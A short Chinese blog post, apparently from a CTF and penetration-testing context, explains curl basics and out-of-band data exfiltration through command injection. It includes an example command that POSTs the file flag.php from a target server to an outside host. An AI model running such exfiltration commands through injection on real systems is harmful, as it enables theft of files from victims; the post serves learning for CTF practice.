这篇博客介绍了curl工具的使用,特别是在渗透测试和CTF比赛中的应用。curl支持多种通信协议,如FTP、HTTP等,可以用于文件上传和下载。文章提到了一个具体的命令示例,展示了如何通过curl进行POST请求,将flag.php的内容以文件xx的名义上传到指定服务器。此外,文章还提及了在命令注入场景下,利用curl进行带外通信的技巧。
简介
curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具,但按传统,习惯称curl为下载工具
cURL支持的通信协议有FTP、FTPS、HTTP、HTTPS等等
条件:
无论是在渗透测试还是ctf比赛中我们都可能会遇到目标应用把用户的输入当做系统命令或者系统命令的一部分去执行的情况。
在实际渗透中,还有很多不会直接回显的情况,这种时候我们就需要利用各种带外通信技巧
用法
语法:
curl [option] [url]使用命令:
curl http://curl.haxx.se这是最简单的使用方法。用这个命令获得了http://curl.haxx.se指向的页面,同样,如果这里的URL指向的是一个文件或者一幅图都可以直接下载到本地
curl -X POST -F xx=@flag.php http://aaa这条命令被目标网站执行,那么意思就是:从目标网站以POST方式向http://aaa上传一个文件,名字叫xx 文件内容是flag.php
参考下面这篇文章:
3分钟短文|Linux 使用curl发起post请求的4个常用方式
body curl命令测试post_利用命令注入外带数据的一些姿势_铁血中锋郭敬明的博客-优快云博客
curl 的用法指南 - 阮一峰的网络日志
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
